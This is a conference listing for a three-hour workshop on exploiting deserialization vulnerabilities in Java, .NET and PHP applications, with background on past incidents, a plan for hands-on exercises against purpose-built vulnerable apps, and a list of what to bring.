Deserialization: RCE for modern web applications

Back to the list of Speakers and Sessions
Deserialization is the process of converting a data stream to an object instance. This 3-hour workshop will go through the basics of exploiting such vulnerabilities in multiple languages.

Deserialization is the process of converting a data stream to an object instance. At the end of 2015, the Java community was taken by storm by deserialization vulnerabilities using a weakness from the library Commons-Collection. The event highlighted how many applications used unsafe deserialization. At the time, Jenkins, WebLogic, WebSphere and JBoss used the same vulnerable code pattern. Two years later, researchers turned to the .NET ecosystem and discovered that many serialization libraries were vulnerable to similar attacks. In 2018, vulnerabilities were found notably in SharePoint (Workflows API), PHP-BB (using a new PHP vector) and many more. Hundreds of CVEs were recorded for the same year proving that deserialization is still an active threat for modern web applications. Developers and pentesters can't ignore this risk because, in most cases, it leads to remote code execution.

This 3-hour workshop will go through the basics of exploiting such vulnerabilities in multiple languages including Java, .NET and PHP. After the theory, participants will have access to vulnerable applications specially designed for the workshop. The objective for the participants will be to exploit applications using the presented methods. Step-by-step instructions and tools will be provided to the participants. Additionally, participants will gain knowledge and skills to build gadgets in dedicated exercises.

Participants should bring:
  • Laptop
  • Java, .NET and Python installed (or a docker image with those)
  • A HTTP Proxy like ZAP or Burp
Participants must know or have:

Intermediate

Beginners will be able to do the first part of the workshop (exploitation with YSoSerial) but have a hard time doing the custom gadget exercise.